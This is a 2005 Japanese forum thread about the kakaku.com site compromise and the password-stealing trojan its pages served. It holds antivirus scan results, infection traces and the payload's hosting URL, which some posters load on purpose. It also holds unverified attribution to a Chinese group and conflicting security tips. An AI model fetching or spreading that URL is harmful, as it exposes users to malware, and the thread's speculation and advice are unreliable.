126 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:52:58
a02.cssがシステムドライブになかったら感染なしでおk?

127 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:53:38
>>125
どこに行けばいい?
やっぱり札幌の西友?

128 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:56:30
>>125
俺ろくまんえんくらい肉買ったんだけど?

129 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:58:47
>>128
ピザでも食ってろデブwwwwwwwwwwwwwwwww

130 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:00:02
ttp://www.yomiuri.co.jp/national/news/20050515it16.htm

131 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:02:58
>>126
いんや、感染すると別名で潜伏しやす。

132 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:07:37
価格コムも相当なマヌケだな

133 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:09:55
a02.css

これふんじゃったんだけど、どうしたらいいの?
なんも反応おこんないようだけど。
うちのAntivirも検出してないんだけど、実際のとこ感染しちゃったのかな。



134 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:15:38
>>133
>>118-119に書いてないから対応してないんじゃ。。

135 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:22:26
価格.comのサイトがどういう経路(穴)から改変されたのか
とか最終的に公表してくれるのかな

後学のためにも知りたいのだが・・・。


136 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:25:35
結局価格コム見ただけで感染してるの?

137 :暫定まとめサイト作成中の人:2005/05/16(月) 09:26:00
下記のようにお叱りを受けました

427 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 09:09:38 ID:Zo1+YkRw
windows2003でNOD32が使えないことのソース。
でたらめかいてんじゃねぇぞ!まとめサイトの中の馬鹿。

よって>>108を再度、サイト内にて訂正します。
>>106-107さん、どうなのでしょう?

138 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:33:44
>>135
オイラの予想だが、cgiにセキュリティーホールがあって
不正なパラメータを渡すことで通常見ることができないファイルが覗けて
ほんで管理者パスワードがバレて、改ざんされた。
ってトコだと思う。

でも、ディレクトリリスティングされるように鯖が設定されてたりと
管理者が相当無能っぽいから、もっとマヌケな原因かもしんない。

139 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:33:58
こちらにも報告

【価格.comへのアクセス】
多分、14日か15日にトップにFireFox1.04でアクセス
タイムアウトエラーが出て見れなかった。
その時はウイルスバスター2004は反応せず

【NOD32英語版Trialで検索】
ApplicationDataフォルダのMozilla\FireFox\profile〜〜に
Win32/PSW.Delf.FZを検出。最新版FireFoxでも感染する様子。

「Clean」エラーになったから、「delete」にしたんだけど問題ないのかな?

140 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:38:36
ヒント:鈴木島男

141 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:38:47
>>139
profile以下を詳しく。キャッシュに残っていたファイルじゃないのかね?

142 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:39:39
FireFoxでも駄目だったのか。
こまめにWindows Updateしてれば大丈夫だったのかな?

143 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:40:32
俺はここ1週間毎日価格混む見てたが、ウイルスバスター反応してなかったので大丈夫っぽい。

144 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:40:33
情報が錯綜してるな

145 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:40:51
価格のどのページにアクセスしたら感染の可能性あり?
今のところ一番怪しいと思われるページってどこなのかな?

146 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:41:09
>>118-119
F-secureは?
一応Kasperskyのを使ってるらしいけど同一じゃない様なので

147 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:41:11
>144 FireFoxまんせーな連中でも、知識はその程度ってことよ。



148 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:41:34
複製されるらしいよ。

149 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:42:32
>>143
156 名前:番組の途中ですが名無しです[] 投稿日:2005/05/16(月) 09:20:02 ID:CNqLZZaY0
VB2005
パターンファイル2005/05/16 2.631.00 で検出せず
つうかまだ対応していないご様子


150 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:51:41
>>147
確かにこれは笑える
1.04は出てるけど、更新機能からはうpできないね


113 名前:名無しさん@お腹いっぱい。[] 投稿日:2005/05/16(月) 07:55:03
・FireFox 1.0.3
・WindowsXP Home SP2 あんまりアップデートしてない
・ノートンインターネットセキュリティ2003

NOD32 でチェックしたら無事だった。
FireFox のおかげだと思う
いやー早めにIE捨ててよかった〜


151 :名無しさん@お腹いっぱい。:2005/05/16(月) 09:59:58
>>137
>>106-107
>>78-83>>88がマルチコピペ荒らしと指摘してるだけかと・・・

152 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:04:59
>>151
深読みしてしまいました、というか勘違い。
指摘、ありがとう...

ツライ

153 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:07:28
>>37
うはwwwwwwwwwwwwっうぇ
丸見えじゃんwwwwwっうぇ

154 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:18:07
満天ウィルスに感染した可能性大

155 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:19:46
NOD32をDLしたけど、インストする際に必要な
ユーザー登録ができない。

回線がパンクしてるの?

156 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:25:29
DLやっとできたがID登録でヤフーアドレスだったため、はじかれた
最初から、どこのフリアドが駄目かかいとけよ!!
2度とつながらないし・・・


157 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:30:53
20タブ開いて全て繋がらなかった・・・

158 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:45:17
>>155はマルチ


159 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:48:46
いつ以降アクセスした人がヤバいのでしょうか?

160 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:49:21
>>159
14日以降だろ

161 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:50:28
このウイルスってどんなことするんですか?
この一週間くらいパソを買い替えようと覗いてたんだけど、
さっきシマンテックの無料ウイルススキャンしたら、
6個見付かった〜。
でも前においらが遊んでみようと思って取っておいたトロイだったぽ。
ちなみにノートンもバスターも入れてないけど、
おいらのパソ君は大丈夫だったのかな〜。

162 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:53:36
>>160
11日でわ?

163 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:54:53

199 名前:555[] 投稿日:2005/05/16(月) 10:09:18 ID:BZCN53z+0
さっき再起動したらウインドウズが終わるときのサウンドが「腹を切って死ぬべきである」という声に 変わっていました。
このウイルスは関係あるのですか?




あ?


164 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:54:55
>>161
>>31

165 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:55:08
>>162
感染がわかったのが11日なら、もう少し前からって考えた方がよくないか?

166 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:57:23
>>31の送信って、どこへ送信するんだろう?

167 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:58:56
>>161
シマンテックのオンラインスキャンでは検出されないよ。

168 :162:2005/05/16(月) 11:00:25
>>165
サーバーの管理者ってログチェックとかしてるから大体1日以内で判明するんじゃ?
と素人意見です。










でも11日から14日まで放置してるってことはまったく管理してなかったかも・・・

169 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:06:52
Symantec AntiVirus Corporation Edition ver. 9.0.2.1000
パターンファイル 5/15/2005 rev. 8

これで、NOD32で見つかったファイルをスキャンしても、検出しなかった。

170 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:09:04
>>161
せめてspybotとadawareくらい入れたら?

171 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:12:42
カカクコム、「価格.com ID」導入でユーザー囲い込み
ttp://japan.cnet.com/news/media/story/0,2000047715,20081487,00.htm

>価格.com IDは、メールアドレスやパスワード、性別、郵便番号、生年月日といった個人情報を登録して無料で発行される、専用のユーザーIDだ。

もしかしてこの情報が漏れた可能性があるかもしれないってこと?

172 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:15:19
>>171
以前から特定の顧客に積極的に売ってたんでは

173 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:15:25
>>171
トロイの木馬がどういうものかを勉強して濃い

174 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:18:20
朝と変化なし。

VirusTotal(http://www.virustotal.com/

This is a report processed by VirusTotal on 05/16/2005 at 04:12:24 (CET) after scanning the file "a02.css" file.

AntivirusVersionUpdateResult
AntiVir6.30.0.1205.13.2005no virus found
AVG71805.13.2005no virus found
Avira6.30.0.1205.13.2005no virus found
BitDefender7.005.16.2005BehavesLike:Win32.AV-Killer
ClamAVdevel-2005050105.15.2005no virus found
DrWeb4.32b05.15.2005no virus found
eTrust-Iris7.1.194.005.15.2005no virus found
eTrust-Vet11.9.1.005.13.2005no virus found
Fortinet2.5105.15.2005no virus found
Ikarus2.3205.15.2005no virus found
Kaspersky4.0.2.2405.16.2005Trojan-PSW.Win32.Delf.fz
McAfee449105.13.2005no virus found
NOD32v21.109705.15.2005Win32/PSW.Delf.FZ
Norman5.70.1005.13.2005no virus found
Panda8.02.0005.15.2005no virus found
Sybari7.5.131405.16.2005Trojan-PSW.Win32.Delf.fz
Symantec8.005.15.2005no virus found
VBA323.10.305.16.2005no virus found

175 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:19:01
>>173
でも、kakaku.comは不正アクセスされたって主張してるんじゃない?
何が漏れててもおかしくはないかと

176 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:19:32
11:13
Jotti's malware scan(http://virusscan.jotti.org/

AntiVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found BehavesLike:Win32.AV-Killer (probable variant)
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found Trojan-PSW.Win32.Delf.fz
mks_vir
Found nothing
NOD32
Found Win32/PSW.Delf.FZ
Norman Virus Control
Found nothing
VBA32
Found nothing

177 :175:2005/05/16(月) 11:21:02
邪魔してごめんよ

178 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:22:24
>>175
ヤフーBBも情報漏出の時は必死にそう主張してたけどね

179 :176:2005/05/16(月) 11:22:51
いえいえ。改行が多すぎることを指摘されて、
いらないものを削除していたら遅れました。

180 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:27:01
Firefox 1.0.4 で ttp://www.j4sb.com/count/data/a02.css を踏んでみました。
踏んだあとで、NOD32 を実行したところ cache ファイル以外には見つかりませんでした。

したがって、Firefox 1.0.4 でアクセスした人は今回は関係ないと思われ。

なお、McAfee (4491) . NAV (2005/5/15 rev.08) では上記 cache ファイルが
検出されないことから現在も未対応であることが確認できました。

ちなみに、漏れの環境は
Windwos XP SP2 + Windows Update すべて適用


181 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:27:40
http://www.yodobashi.com/enjoy/more/i/27702631.html
¥4,980 (税込) 30%引 定価:¥7,140


182 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:29:16
http://shopping.yahoo.co.jp/search?p=NOD32&X=2

183 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:30:22
NOD32アンチウイルス ダウンロード標準版 4,200円(税込)
http://store.yahoo.co.jp/vector/sr035685-20.html

184 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:30:37
Norton AntiVirusには、テスト済みのIntelligent Updater以外に
Rapid Release Virus Definitions http://securityresponse.symantec.com/avcenter/beta.download.html
というベータ版の定義があるんだが、これで検出できるか誰か試してくれないか。

185 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:31:18
NOD買ったけど登録できねぇ!

186 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:32:46
ハズレですね

187 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:34:59
新たな事実発覚!

価格.comサーバ落ち事件は
実はNOD販売キャンペーンだった!

188 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:35:15
セキュリティホールmemoには、トレンドマイクロやSophos、F-secureなどの製品の情報もあり。
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2005/05.html#20050516_kakaku

189 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:35:30
なんてねw

190 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:36:12
>>185
http://canon-sol.jp/product/nd/がd$から(ry

191 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:36:55
>>187
他社社員デムパ発信乙w

192 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:39:44
>>187
NOD32の売上げだけじゃ、損害賠償埋められないでしょ

193 :187:2005/05/16(月) 11:40:55
>>191-192
ネタをネタと見抜けない人は(ry

194 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:46:08
887 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 11:28:52 ID:fj9dUWUR
ごめん

「靖国神社」をカナで書くと「カカクコム」になるって
中国の掲示板に書いたの私です
こんな騒ぎになるとは思いませんでした
今は反省しています

http://news19.2ch.net/test/read.cgi/newsplus/1116194590/887

195 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:47:27
価格頻繁に見てるんだけどオペラとプロクソミトロン使用してれば大丈夫ですかね?

あとタスクマネージャーは使えるけどそれは関係ないかな

196 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:49:43
>>194
ワラタ!

197 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:51:35
>>184
Firefox 1.0.4 で ttp://www.j4sb.com/count/data/a02.css を踏んで
キャッシュをNAV2003 Intelligent Updater:拡張バージョン番号: 5/15/2005 rev. 8でスキャンしても発見できず。
Rapid Release Virus Definitionsはダウソして実行すると5/15/2005 rev. 25になるのだが、やはり発見できず。

198 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:00:57
価格comの運営のいい加減さが暴露されたってことでFA?
個人情報を預かるサイトとしての責任を糾弾するべし。

199 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:01:50
>>197
つうか、NAV2003 Intelligent UpdaterもRapid Release Virus Definitionsもこのウイルス検出可能なのか?

200 :200:2005/05/16(月) 12:02:22
200

201 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:02:27
>>198
ニュー速orニュー速+逝け

202 :197:2005/05/16(月) 12:03:36
>>199
つーか、検出可能かどうか試した報告なのだが…

203 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:05:14
公式更新しました

http://www.kakaku.com/

【重要なお知らせ2】
当社運営サイトを閲覧されたユーザーの方々へのセキュリティ対策のご報告
2005/5/16 12:00



204 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:05:26
価格comを普通に見てた俺。
とりあえず、報告をする。

アンチドート(最新モジュール):菌無し
NOD32ver.1,1097(20050515最新):菌無し

大丈夫っぽい?

205 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:06:12
>>199
定義ファイルは2005と同じだから対応していれば可能。
というか、閲覧者は現時点で2つのウィルスに感染した可能性が高い。
1つはノートンの最新の定義ファイルで感知可能だが、もう一方はおそらく無理。
注意することは、最新の定義ファイルは自動アップデートではインストールされない。
それにまだ確認されていないウィルスを仕掛けられていた可能性も捨てきれないから、
要注意。

心配してここに書き込んでいるやつ、早くネットから切断しろ。ここに書き込んでいる
内容も送信されているかもしれないぞ。

206 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:08:39
>>205
アウトバウンドも監視するFW入れてればとりあえず大丈夫。
Norton Internet SecurityとかZoneAlarmとか。
バスターはFWを「高」にする。

207 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:10:21
>>206
>FW入れてればとりあえず大丈夫。

ルーターだけでも大丈夫?

208 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:11:15
Intelligent Updater をいちいち Install するのがメンドウな香具師は
これを入れておけ!

NAVDefUpdate
http://www.vector.co.jp/soft/winnt/util/se327620.html

209 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:12:58
>>207
ダメ。プログラムごとに制御してなければ駄目。
Windows XP 付属のFWも駄目。

210 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:16:36
つか、このウィルスはなにする奴?


211 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:18:29
>>210
まとめサイト
価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・)
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

212 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:19:25
おまいら大変だ!またサイトが落ちてるぞ!

213 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:19:26
>>203
そこ、さっきまで見れたが今はdでねーか?

214 :213:2005/05/16(月) 12:20:45
>>212
やっぱりd$か・・・

215 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:21:25
ちょいと質問なんだがタグが仕込まれてたのはトップだけなのか?
記事だけ見てびびってるんだが

216 :212:2005/05/16(月) 12:21:26
と思ったら繋がった・・

217 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:23:46
【kakaku.com】カカク・ドット・コム【価格.com】
http://money3.2ch.net/test/read.cgi/shop/1096906296/574
の書き込みをしたものだが、


norton+Intelligent Updaterでの検出結果

C:\WINNT\system32\htdll.dll
C:\WINNT\Downloaded Program Files\#.exe
c:\winnt\system32\explorer.exe
この3つのファイルと、IEのキャッシュがPWSteal.Lineageとして検出された。

explorer.exeはサイズが200KB ぐらいで、アイコンがNotepadのもの。

レジストリでは
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
にc:\winnt\system32\explorer.exeが追加されていた。

で、正常なexplorer.exeが起動せずに、デスクトップが壁紙だけになった。

職場のPCが感染したんだが、Symanecに怪しいファイルを提出したり、復旧作業やらで大変だったよ。

218 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:24:26
要するにどういうウィルスかよくわかってないわけだ。

219 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:24:33
>>216
ん?
まだd$ぞ

220 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:27:01
>>217
乙です。

221 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:29:04
いいサイトだっただけに残念だ。
これを機会に安全対策に力をいれてほしい。

222 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:31:48
なるほど、漏れがこの間買ったグラボが激しく価格下落していたのも
スーパーハカーの改竄だったのか。
安心したよ(´∀`)

223 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:32:36
>>217
それ、IEのキャッシュ以外は今回の騒動に関係ないじゃん

224 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:32:54
>>217
価格ドットコムのセキュリティ担当はSymanecだったのか・・・

225 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:33:42
tがぬけてるがな

226 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:35:15
>>224
シマネック いい名前だ・・

227 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:35:38
yahooもなにやってんだか。
あぶねぇだろ
http://dailynews.yahoo.co.jp/fc/domestic/net_crime/

228 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:36:54
>>227
yahoo=ahooですから・・・

229 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:38:04
>>217
ん?これって感染すると OS が明らかに挙動不審になるということ?

230 :215:2005/05/16(月) 12:38:51
誰か詳細を

231 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:40:11
>>230
価格コムの中の人しか分からん。

232 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:42:06
>>230-231
不正アクセスを受けてから5日も経ってるのに、まったく情報が公開されてない。だめぽ

233 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:43:12
>>230-231
うーん・・・不安もあるがAVGが対応してくれるのを待ってみるか・・・

234 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:43:25
>>229
どうやら3種類以上仕込んであったようだ。
sp1にしている企業とかがひっかかるタイプと
それ以外って感じで。

235 :233:2005/05/16(月) 12:43:53
スマソ>>231-232

236 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:43:57
シマンテックがセキュリティを受け持っていた価格ドットコム
が攻撃でやられ、NOD32アンチウィルスが問題解決した、という
理解でいいのか?

237 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:45:00
>>236
ゼンゼンチガウ...

238 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:46:19
>>211

239 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:46:28
>>236
カカクコムがどこのベンダー使ってたかは不明。>>217がノートン使ってただけでしょ。

240 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:46:57
>>236
さすがNOD32

241 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:47:58
次回はNOD32にしようと思う俺が居る件について。

242 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:48:21
>>232
だな。
価格comは信用出来んな。
価格破壊するなら良いが、ネット破壊の強力をするとは。

243 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:50:01
価格comで評判が悪かった会社が怪しい

244 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:50:07
いたずらに不安を増大させてるな

245 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:50:20
オンラインスキャンで発見できるものはありますか?
別ウィルスソフト入れているものでできればアンインストせずに感染してるか確認できればと思うのですが


246 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:50:33

        rー、
    」´ ̄`lー) \
    T¨L |_/⌒/ <NOD32
     `レ ̄`ヽ〈
       |  i__1
     _ゝ_/ ノ
      L__jイ´_ )
        |  イ
         |  ノ--、           r'⌒ヽ_   
        ゝ、___ノ二7  /´ ̄l、_,/}:\  <NAV
         |ーi |   l_/ /__ィ::.  ゝ~_ィ´:; ,ゝ
        __〉 {      (T´ |1:::.  \_>、};;_」
       'ー‐┘       ! ` ̄''ァ一 、\ ヽ}
               〈` ̄ ̄^`¬ノ .::〔 ̄´
                   1  ヽ   .:::レ  ヽ、
                |_イー-、_;;j|_:.   ゝ、
                __,,,... -- |. {―――‐フゝ、   〉 -- ...,,,__
        _,, -‐ ´       ,r|__ト,    1ニノ ー'´       ` ‐- ,,_
    , ‐ ´         └―'´                     `


247 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:52:24
>>243
NOD32とか?

248 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:52:54
価格一週間閉鎖で倒産する会社とか普通に出てきそうだw

249 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:54:10
>>247
NOD32は評判良かったぞ

250 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:54:16
canon-sol.jpが落ちている件について

251 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:54:42
>>246
        rー、
    」´ ̄`lー) \
    T¨L |_/⌒/  <NOD32   
     `レ ̄`ヽ〈                       rー、 ≡=-
       |  i__1                       `ー) \  <バスター  
     _ゝ_/ ノ                  」´ ̄`l  _/⌒/  _
      L__jイ´_ )                 T¨L |⌒`ヽ〈 ,イ´_ )≡     二
        |  イ                  `レ ̄ i__1  |  イ         三   ─   (´⌒;;
         |  ノ--、           r'⌒ヽ_      _ゝ_/ ノ ⌒/ヽ、 ヾ--、   ─二       (´⌒;;
        ゝ、___ノ二7  /´ ̄l、_,/}:\    L__j "´   (   ゝ、___ノ二7   ≡=  (´⌒ (´⌒;;
         |ーi |   l_/ /__ィ::.  ゝ~_ィ´:; ,ゝ           |ーi |      l_/  三   (;;   二 (´⌒;;
        __〉 {      (T´ |1:::.  \_>、};;_」           _〉 {       二  (´⌒ (´⌒;;
       'ー‐┘       ! ` ̄''ァ一 、\ ヽ}          'ー‐┘ ≡三 (´⌒   (´⌒  (´⌒;;
               〈` ̄ ̄^`¬ノ .::〔 ̄´                   三 (´⌒(´⌒;;
                   1  ヽ   .:::レ  ヽ、  <NAV  
                |_イー-、_;;j|_:.   ゝ、
                __,,,... -- |. {―――‐フゝ、   〉 -- ...,,,__
        _,, -‐ ´       ,r|__ト,    1ニノ ー'´       ` ‐- ,,_
    , ‐ ´         └―'´                    

252 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:55:25
3,4日受注無いと小さいトコは厳しいだろうな。
サクセスやばおーは問題ないだろうが、kakakuがないと客が来ないとこはマジでやばそう。

253 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:55:46
>>250
ありゃりゃ・・・

254 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:56:13
>>250
重いだけなのか、はたまた本当に落ちてるのか
価格.comのTOPも繋がらないし

どこからかアタック喰らってる?

255 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:56:45
>>244
価格comの対応がお粗末過ぎる。
何日も経ってるのにあんなアナウンスしか出来ないとは情けない。
ネットで商売する資格なし。

256 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:57:00
>>245 オンラインスキャンはどう考えても性能が劣るからこんな緊急事態には向いていない

257 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:57:52
>>243
>価格comで評判が悪かった会社が怪しい

シマンテックはあまりよくなかったけど、そんなことする会社では
絶対ない。
それは断言できる。





258 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:59:19
NVIDA火壁を使うか。
外に対してどう動くかはわかるだろ……ちゃんと動けば。

259 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:59:23
>>まとめサイト
NOD32による対処方法の部分、誤解を生みかねないというか
勘違いしたまま安心する人が出てくる可能性が…

ttp://u4.eset.com/eval/win/v2/nentenst.exe
何を勘違いしたのかは知らないが、これは英語体験版であって最新パターンではない。
自己解凍RARをバラしてタイムスタンプを確認すれば判るが、最新版でもない…
20041130 対応の Win32/TrojanDownloader.Small.AAO は対応済みと思われるが
20050511 対応の Win32/PSW.Delf.F はおそらくそのままでは対応していない…

20050511 以降のパターンに更新させた上でスキャンする事が重要。
毎度の事ながら、NOD関連はホント無茶苦茶だな(苦笑

260 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:59:27
>>257
ピーターはいいヤツだよな

261 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:59:50

255 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 12:57:16 ID:+VguF0Vj

犯人は中国(おそらく北京)の反日組織です。証拠を発見しました。

スクリプトの拡張子が普通じゃないのに注目して、"count/counter.ap?id="をググってみると、

ttp://www.google.com/search?q=%22count%2Fcounter.ap%3Fid%3D%22

j4sb.com以外に shtm1.com と 0x61.com が同じスクリプトを走らせていることが分かります。
whoisでこれらのサイト情報を検索すると

ttp://whois.ansi.co.jp/?key=shtm1.com
ttp://whois.ansi.co.jp/?key=0x61.com

Admin Name........... pi ger
Admin Address........ hidden
Admin Address........
Admin Address........ Beijing
Admin Address........ 123456
Admin Address........ BJ
Admin Address........ CN
Admin Email.......... fuckjpmm@china.com
Admin Phone.......... +86.1012345678
Admin Fax............ +86.1012345678

と出てきます。 fuckjpmm とは "Fuck Japanese!" 
どう見ても反日です。
警察に通報して、外交問題にしてください。
まとめサイトの方、よろしく。

↑これってホント??

262 :名無しさん@お腹いっぱい。:2005/05/16(月) 12:59:54
自分ところのセキュリティ製品で対応できないウイルスしかけてどうする。
実際、●●対応遅いよ、とスレで言われてるわけで。

263 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:02:29
シマンテックはシロだな

264 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:02:37
NOD32が落とせない

265 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:02:48
           ,-=;,
          {__7!
          〔_ラレ        ,、_,-‐y;
           `y"l       rヲレへシ'"
           iト-ヘ、      (_;フイ             r;_/iレソ
            l  'ヽ      ル ||                し ン′
              ヽ   ヽ     レ' ||!            人_フ
             V  ヽ,    |   |.| r‐-、=‐-、    _/ /   <NOD32  
              ヽ   ヽ,  ト = }{i y=‐'~Y__ 〉  / /
               `i 、,  ヽ, }- ルハjト'`_ント∠-r'"  シ´
                V   `;|   i∨  ̄~7  ン〈___/ 
                V丶  |   リ >,    ( <_/ ,_      
                 ヾ  {   ソ レ  ン ;_ン'" ,r"<rn ゞミヽワッショイ!
                  ゝ、ゝ = 〃ソノ__/   / y'"J | \` ヽ
   rn,              rfレ`ー-=-‐''~ ̄   /`7  `、|  ヽ-'ヽワッショイ!
  rJllル7       rnh;   l´ ´'リ  ,rn     / r'ン==ト、!__  V ヽ
  〉__ソ       ヾヽ``ij'l 〉 /、,ハjjj し'l mhレ'   /f" |リレ7,,m〉  |  |
  |  {   rfjn   ,;'V _ン',/ //〉r>,、__//リリ ト  〈 }'=‐' ソ 〉トii,_/  j
  .|  i _,-;ゝ_ソ  {' ' 'V V /'ハ~ ' ノヽ ヽ,;ヾ レ'⌒jー'-ン Λ'ー'~ヽ,  / <2chネラ
    ! V;;;ゞ''~ ̄ヽ_〉_j,;|  ヽ/レ_>' ラ';;/;-‐-{〉⌒|!    / /     〉"  <kakaku.com
   }  V       }リ レヽ  ヽ彡';,、-l ・ ・ ゜j、=ヾヽ / / `` _,‐'"  <www.j4sb.com

266 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:03:28
>>265
GJ!

ワラタ

267 : :2005/05/16(月) 13:04:33
COREPRICE210.189.92.161Windows Server 2003Microsoft-IIS/6.018-Nov-2004
COREPRICE210.189.92.161NT4/Windows 98Microsoft-IIS/4.017-Nov-2004
COREPRICE210.189.92.161Windows Server 2003Microsoft-IIS/6.016-Nov-2004
COREPRICE210.189.92.161NT4/Windows 98Microsoft-IIS/4.012-Nov-2004

価格.comのサーバなんだけど、負荷分散でNT4とServer 2003の2台体勢でやっていて
NT4のパッチあて忘れていたとかいう落ちかな。もしServer 2003にパッチを当てていて
OSの虚弱性が原因ならば大きな問題になるかと思う。

しかしこういう場合って大抵はコンテンツ管理画面に入られたりするのが原因なんだよな。
